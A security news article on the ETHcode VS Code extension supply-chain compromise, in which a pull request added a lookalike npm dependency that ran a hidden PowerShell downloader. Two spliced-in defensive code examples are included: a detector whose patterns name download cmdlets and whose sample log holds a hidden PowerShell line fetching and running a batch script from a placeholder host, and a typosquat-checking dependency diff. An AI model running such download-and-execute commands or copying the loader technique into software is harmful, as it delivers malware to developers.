Two-Line Code Injection in Compromised VS Code Extension Triggers Supply Chain Attack

ReversingLabs (RL) researchers have uncovered a surge in malicious packages targeting cryptocurrency users and developers.

Notably, RL’s Karlo Zanki reported on PyPI packages designed to infiltrate the Solana ecosystem, while Lucija Valentić exposed npm packages that steal crypto funds by injecting code into legitimate local packages.

These incidents highlight a growing trend: attackers increasingly use open-source repositories as delivery vehicles for malware, often relying on “typosquatting”—the practice of mimicking legitimate package names to trick unsuspecting developers into downloading malicious code.

However, these are not the only threats facing the software supply chain. More sophisticated attacks, such as those that compromised SolarWinds Orion, 3CX’s DesktopApp, and XZ Utils, involve tampering with the development pipelines of trusted projects.

These attacks can have devastating consequences, potentially impacting thousands of organizations by inserting malicious code into widely used software.

The ETHcode Compromise: A Case Study in Supply Chain Vulnerability

RL researchers recently identified a textbook example of a supply chain attack with the compromise of ETHcode, a legitimate Visual Studio Code (VS Code) extension used by Ethereum developers.

ETHcode, maintained by the 7finney GitHub organization, had nearly 6,000 installs and was considered a trusted tool for smart contract development.

Figure: Extension as shown on the marketplace

The breach began on June 17, when a newly created GitHub account, Airez299, submitted a pull request (PR) promising to modernize the codebase.

The PR appeared helpful, proposing updates and new features.

Figure: GitHub pull request comments

Both a 7finney member and GitHub’s AI reviewer examined the code, requesting only minor changes and missing the threat hidden within.

Buried among 4,000 lines of changes were just two lines that compromised the entire extension.

The first line added a new dependency, “keythereum-utils,” to the extension’s package.json, a name chosen to resemble the legitimate “keythereum” library.

The second line loaded that dependency with Node.js’s “require” function. Because require runs a module’s top-level code the moment it is loaded, the heavily obfuscated payload inside keythereum-utils executed as soon as the extension’s code loaded it.

Upon deobfuscation, RL researchers discovered that the malicious script spawned a hidden PowerShell process to download and run a batch script from a public file-hosting service.

The full capabilities of this second-stage payload are still under investigation, but it is suspected to target crypto assets or compromise Ethereum contracts under development.
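The behaviour described above (a developer tool spawning a hidden PowerShell that fetches and runs a script) is something an endpoint detection rule can look for. The following is an added example, not code from the article, ReversingLabs or 7finney: a small scoring detector run over constructed Sysmon-style process-creation records. The article does not quote the real command line, so the hidden-window switch and the download cmdlets it matches are assumptions about how such a launch typically looks, not observed indicators.

```javascript
// Added example, not code from the article or from ReversingLabs/7finney:
// a scoring detector for the behaviour described above, run over constructed
// Sysmon-style process-creation records (ParentImage, Image, CommandLine).
// The article does not quote the real command line, so the "hidden window"
// switch and the download cmdlets below are assumptions about how such a
// launch typically looks, not observed indicators.

const DEV_TOOL_PARENTS = [/\\code\.exe$/i, /\\node\.exe$/i]; // VS Code / Node hosts
const POWERSHELL = /\\(powershell|pwsh)\.exe$/i;
const HIDDEN_WINDOW = /-w(?:indowstyle)?\s+hidden/i;          // assumed switch
const DOWNLOAD_PRIMITIVE =
  /invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|start-bitstransfer|\bcurl\b/i;
const REMOTE_URL = /https?:\/\/\S+/i;
const BATCH_RUN = /\.(bat|cmd)\b|\bcmd(?:\.exe)?\s+\/c\b/i;

// Score one process-creation event; 0 means "not a dev tool spawning PowerShell".
function scoreEvent(ev) {
  const reasons = [];
  const parent = ev.ParentImage || "";
  const image = ev.Image || "";
  if (!DEV_TOOL_PARENTS.some(re => re.test(parent)) || !POWERSHELL.test(image)) {
    return { score: 0, reasons };
  }
  let score = 1;
  reasons.push("developer tool spawned PowerShell");
  const cl = ev.CommandLine || "";
  if (HIDDEN_WINDOW.test(cl)) { score += 2; reasons.push("hidden window requested"); }
  if (DOWNLOAD_PRIMITIVE.test(cl) || REMOTE_URL.test(cl)) { score += 2; reasons.push("fetches remote content"); }
  if (BATCH_RUN.test(cl)) { score += 1; reasons.push("runs a batch/cmd script"); }
  return { score, reasons };
}

// Parse newline-delimited JSON; malformed lines are skipped so one bad record
// does not silence the whole detector.
function parseLog(text) {
  const events = [];
  for (const line of text.split("\n")) {
    const t = line.trim();
    if (!t) continue;
    try { events.push(JSON.parse(t)); } catch (_) { /* skip malformed line */ }
  }
  return events;
}

// Return the events whose score reaches the alert threshold.
function detect(text, threshold = 4) {
  return parseLog(text)
    .map(ev => ({ ...ev, ...scoreEvent(ev) }))
    .filter(ev => ev.score >= threshold);
}

// Constructed sample log: an ordinary integrated-terminal launch, a launch that
// matches the described behaviour, a non-dev-tool parent, and one bad line.
const SAMPLE_LOG = [
  JSON.stringify({ ParentImage: "C:\\Program Files\\Microsoft VS Code\\Code.exe",
    Image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    CommandLine: "powershell.exe -NoLogo" }),
  JSON.stringify({ ParentImage: "C:\\Program Files\\Microsoft VS Code\\Code.exe",
    Image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    CommandLine: "powershell.exe -WindowStyle Hidden -Command \"Invoke-WebRequest https://example.invalid/stage2.bat -OutFile $env:TEMP\\s.bat; cmd /c $env:TEMP\\s.bat\"" }),
  JSON.stringify({ ParentImage: "C:\\Windows\\explorer.exe",
    Image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    CommandLine: "powershell.exe -WindowStyle Hidden -File backup.ps1" }),
  "this line is not JSON",
].join("\n");

console.log(JSON.stringify(detect(SAMPLE_LOG), null, 2));
```

The parent-process check is what keeps the rule quiet: PowerShell launched from VS Code’s integrated terminal scores 1 and never alerts, while a hidden launch that also downloads and runs a script from the same parent scores 6. Tune the threshold and the parent list to the tooling actually present on your developer fleet.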

Upon discovery, RL alerted Microsoft, leading to the extension’s removal from the VS Code Marketplace on June 26.

The 7finney team quickly issued a clean update (version 0.5.1) on July 1, removing the malicious code and restoring user safety.

Lessons Learned and Steps Forward for Developers

The ETHcode incident underscores the urgent need for vigilance in software supply chains. Unlike typical typosquatting attacks, this compromise leveraged a legitimate, widely used extension and exploited the trust inherent in open-source collaboration.

The attack was facilitated by VS Code’s automatic extension updates, potentially spreading malware to thousands of developer systems.

Key takeaways for developers and teams include:

  • Manually verify contributor identities. New GitHub accounts submitting major changes should raise immediate red flags.
  • Scrutinize new dependencies. Review package.json (and the lockfile) in every PR for added or renamed dependencies, and vet any newcomer with a package-scanning service before merging.
  • Leverage security tools. Platforms like RL’s Spectra Assure can flag suspicious behaviors and help compare software versions for unauthorized changes.
Figure: Spectra Assure diff showing new behaviours
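The two malicious lines described earlier (a new entry in package.json and a require() of it) and the “scrutinize new dependencies” takeaway both come down to one review step: diff the manifest, look hard at every name that was not there before, and find out whether the new code actually loads it. The following is an added example, not code from the article, ReversingLabs or the ETHcode project. The allowlist of known packages, the two manifests and the source fragment are constructed for illustration; “keythereum” is a real npm package and “keythereum-utils” is the lookalike named in the article.

```javascript
// Added example, not code from the article, ReversingLabs or the ETHcode
// project: review helper that diffs two package.json manifests, flags
// dependencies that appear only in the new one, scores each new name against
// an assumed allowlist of packages the project is known to use, and checks
// whether the new source loads them. Manifests and source are constructed;
// "keythereum" is a real npm package and "keythereum-utils" is the lookalike
// named in the article.

const KNOWN_PACKAGES = ["keythereum", "ethers", "web3", "solc"]; // assumed allowlist

// Levenshtein edit distance: how many single-character edits separate two names.
function editDistance(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) dp[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      dp[i][j] = Math.min(
        dp[i - 1][j] + 1,                                   // deletion
        dp[i][j - 1] + 1,                                   // insertion
        dp[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1)  // substitution
      );
    }
  }
  return dp[a.length][b.length];
}

// Returns the known package a name imitates (prefix/suffix of it, or within
// two edits of it), or null. These are review candidates, not verdicts.
function lookalikeOf(name) {
  if (KNOWN_PACKAGES.includes(name)) return null; // the real package itself
  for (const known of KNOWN_PACKAGES) {
    if (name.startsWith(known + "-") || name.endsWith("-" + known)) return known;
    if (editDistance(name, known) <= 2) return known;
  }
  return null;
}

function collectDeps(manifest) {
  return { ...(manifest.dependencies || {}), ...(manifest.devDependencies || {}) };
}

// Dependencies present in the new manifest but absent from the old one.
function diffDependencies(oldManifest, newManifest) {
  const before = collectDeps(oldManifest);
  const after = collectDeps(newManifest);
  return Object.entries(after)
    .filter(([name]) => !(name in before))
    .map(([name, version]) => ({ name, version, lookalikeOf: lookalikeOf(name) }));
}

// Module specifiers loaded via require() or ES import in a source string.
function findLoadsOf(source, names) {
  const re = /(?:require\(\s*["']([^"']+)["']\s*\)|from\s+["']([^"']+)["'])/g;
  const hits = [];
  let m;
  while ((m = re.exec(source)) !== null) {
    const mod = m[1] || m[2];
    if (names.includes(mod)) hits.push(mod);
  }
  return hits;
}

// One row per added dependency: version, lookalike verdict, and whether the
// new code actually loads it (a require() runs the package's top-level code).
function reviewChange(oldManifest, newManifest, source) {
  const added = diffDependencies(oldManifest, newManifest);
  const loaded = findLoadsOf(source, added.map(d => d.name));
  return added.map(d => ({ ...d, loadedBySource: loaded.includes(d.name) }));
}

// Constructed "before" and "after" manifests and a fragment of the new source.
const oldPkg = { name: "ethcode", dependencies: { keythereum: "^1.2.0", ethers: "^5.0.0" } };
const newPkg = {
  name: "ethcode",
  dependencies: {
    keythereum: "^1.2.0",
    ethers: "^5.0.0",
    "keythereum-utils": "^1.2.7",
    "@vscode/webview-ui-toolkit": "^1.4.0",
  },
};
const newSource = `
const keythereum = require("keythereum");
require("keythereum-utils"); // loading alone is enough to run its code
import { Uri } from "vscode";
`;

console.log(JSON.stringify(reviewChange(oldPkg, newPkg, newSource), null, 2));
```

Run against the constructed input, the helper reports two additions: the webview toolkit with no lookalike match, and keythereum-utils flagged as imitating keythereum and loaded by the new source. In a real review the allowlist would be the project’s existing dependency set, and any row with a lookalike match or a bare require() whose return value is discarded deserves the reviewer’s attention before anything else in the PR.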

RL continues to monitor the situation and share updates with the community.

The company has also launched a VS Code community on secure.software, enabling developers to query and assess suspicious extensions.

As this incident demonstrates, even trusted software can be compromised with minimal changes, making rigorous review and proactive security measures essential in defending against modern supply chain attacks.

Indicators of Compromise (IOCs):

npm package

Package Name        Version   SHA1
keythereum-utils    1.2.1     17802c834861bb983a248234b0a5d17a62fe4474
keythereum-utils    1.2.2     0a9b47d707e167af384403af7c466eb43d46f343
keythereum-utils    1.2.3     442cac64cd5e7783503970c446a1d0d0a0dab69d
keythereum-utils    1.2.4     933967db50602a058bd1764c44fc98305866e89e
keythereum-utils    1.2.5     351a25bd647587aaf76bd8a303a687bb6ad79f8f
keythereum-utils    1.2.7     e37adafde5e03001172663256cf3d480e3765b91

VS Code extension

Package Name        Version   SHA1
7finney.ethcode     0.5.0     8f93077e8193996fc096de359401a8e9aa6ffc7f


Kaaviya (https://cyberpress.org/) is a Security Editor and fellow reporter with Cyber Press. She covers various cyber security incidents happening in cyberspace.
